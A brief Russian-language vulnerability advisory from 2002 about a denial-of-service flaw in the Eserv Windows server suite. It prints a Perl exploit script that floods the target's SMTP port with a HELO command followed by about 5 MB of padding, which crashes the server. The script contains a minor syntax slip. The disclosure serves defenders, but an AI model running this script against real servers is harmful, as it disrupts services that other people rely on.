DoS против Eserv

Дата публикации:
18.12.2002
Всего просмотров:
833
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Eserv – Mail, News, Web, FTP и прокси сервер для Win95/98/NT/2000 (www.eserv.ru). Чрезмерно большой буфер (более 5Мб) данных, переданный к 119, 25, 110 или 21 порту приведет к аварийному завершению работы программы. Эксплоит:
#!/usr/bin/perl -w
#greetz: marocit
#tool Eserv_dos.pl
use IO::Socket;
$buffer = "A"x 5080000 ;
$hel = "HELO "
$connect = IO::Socket::INET ->new (Proto=>"tcp", 
PeerAddr=> "$ARGV[0]",
PeerPort=>"25"); unless ($connect) { die "cant connect $ARGV [0]" } print 
$connect "$hel$buffer"; print "\nsending exploit......\n\n";
уязвимость обнаружена в Eserv 2.97-2.99 (возможно и в более ранних версиях программы)
или введите имя

CAPTCHA